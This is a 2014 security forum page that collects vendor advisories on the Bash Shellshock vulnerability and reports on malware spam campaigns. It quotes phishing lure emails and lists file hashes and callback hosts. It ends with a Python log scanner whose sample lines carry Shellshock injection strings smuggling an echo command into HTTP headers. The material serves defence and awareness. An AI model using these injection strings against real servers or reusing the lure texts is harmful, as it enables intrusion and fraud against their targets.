"Oracle has determined that following Oracle products are vulnerable to CVE-2014-7169 and CVE-2014-6271. Fixes for these products will be distributed as they become available and this Security Alert will be updated to reflect the availability of these fixes..."
2014-Sep-29 - Rev 4. Detailed product information moved to Bash Vulnerabilities - CVE-2014-7169*

* http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
"... list of affected products and mitigation instructions as of September 29, 2014 at 02:12 PM Pacific..."

> https://linux.oracle.com/pls/apex/f?p=105:21:3597568493916265

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Sep 26, 2014


 8 
 on: September 26, 2014, 17:13:59  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Huge Update – 1789 Domains
- http://www.malwaredomains.com/?p=3663
September 25th, 2014 - "... -1789- domains were added two days ago. Sources: www.spamhaus.org, safebrowsing.google.com, osint.bambenekconsulting.com..."


 9 
 on: September 26, 2014, 04:02:44  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

 Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
   Payment Details [Incident: 711935-599632]
Typical e-mail details:
   We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

 RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55*. This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/


 10 
 on: September 26, 2014, 02:29:01  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

- http://tools.cisco.com/security/center/publicationListing.x

GNU Bash Environmental Variable Command Injection Vuln
Advisory ID: cisco-sa-20140926-bash
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
2014 Sep 26 - "Summary: On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed through environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.
All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, exploitation of the vulnerability results in an authenticated attacker having the ability to execute commands for which they are not authorized. A number of Cisco products ship with or leverage an affected version of the Bash shell. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability...
(See "Affected Products" list at the URL above.)
Rev 1.4 - 2014-Sep-30 - Updated the Affected Products, Vulnerable Products, and Products Confirmed Not Vulnerable sections.

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Sep 26, 2014

Also see: https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability
Last revised: Sep 30, 2014

- https://www.us-cert.gov/ncas/alerts/TA14-268A
Last revised: Sep 30, 2014

- http://www.kb.cert.org/vuls/id/252743
Last revised: 1 Oct 2014

Bash vuln -aka- Shellshock ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/
Sep 25, 2014
> http://about-threats.trendmicro.com/us/threat-intelligence/internet-of-everything/attack-scenarios/the-shellshock-vulnerability-bash-bug

FREE protection for Shellshock
- http://www.trendmicro.com/us/security/shellshock-bash-bug-exploit/index.html

- http://www.securitytracker.com/id/1030890
CVE Reference:
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
Updated: Oct 1 2014
Original Entry Date: Sep 24 2014
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Vendor Confirmed: Yes Exploit Included: Yes  
Version(s): 4.3 ...
... vulnerability is being actively exploited
Vendor URL: https://www.gnu.org/software/bash/
___

Semiannual Cisco IOS Software Security Advisory Bundled Publication
- http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html
Sep 24, 2014 - "... Use the Cisco IOS Software Checker* to quickly determine whether a given Cisco IOS Software release is exposed to Cisco product vulnerabilities..."
* http://tools.cisco.com/security/center/selectIOSVersion.x

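A small detector for the automated Shellshock probing that the FireEye excerpt (high-volume scans and PoC-like scripts) and the Cisco summary (functions smuggled through environment variables) describe, as an added example written for this post and not code from any of the quoted sources: it parses web-server combined-format access log lines and flags the function-definition signature "() {" in the request line, Referer or User-Agent, the three fields a CGI handler copies into Bash's environment. The regexes, log lines and IPs are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format; this regex is written for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# The marker of a function definition carried in an environment variable:
# "() {" with optional whitespace, which is what CVE-2014-6271 probes contain.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def scan_line(line):
    """Return (ip, field) for each header field carrying the signature, else []."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; skip rather than guess
    hits = []
    for field in ("req", "ref", "ua"):
        raw = m.group(field)
        # Probes in the request line are often percent-encoded; match both forms.
        if SHELLSHOCK_RE.search(raw) or SHELLSHOCK_RE.search(unquote(raw)):
            hits.append((m.group("ip"), field))
    return hits


def scan_log(lines):
    """Scan many lines; returns the flat list of (ip, field) findings."""
    findings = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


def probes_by_source(lines):
    """Count flagged fields per source IP; input for a watch or block list."""
    counts = {}
    for ip, _field in scan_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample log lines (documentation-range IPs, harmless payloads).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; echo probe"',
    '198.51.100.7 - - [26/Sep/2014:10:01:05 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Sep/2014:10:02:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" '
    '404 209 "() { x;}; echo probe" "curl/7.37.0"',
    '203.0.113.11 - - [26/Sep/2014:10:03:41 +0000] '
    '"GET /cgi-bin/%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe HTTP/1.1" 400 0 "-" "wget/1.15"',
]

if __name__ == "__main__":
    for ip, field in scan_log(SAMPLE_LOG):
        print(f"shellshock probe from {ip} in {field}")
```

On a live server the same functions can be fed `open("/var/log/apache2/access.log")` line by line; a hit only shows a probe was received, not that the CGI target was vulnerable.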

Powered by SMF 1.1.19 | SMF © 2013, Simple Machines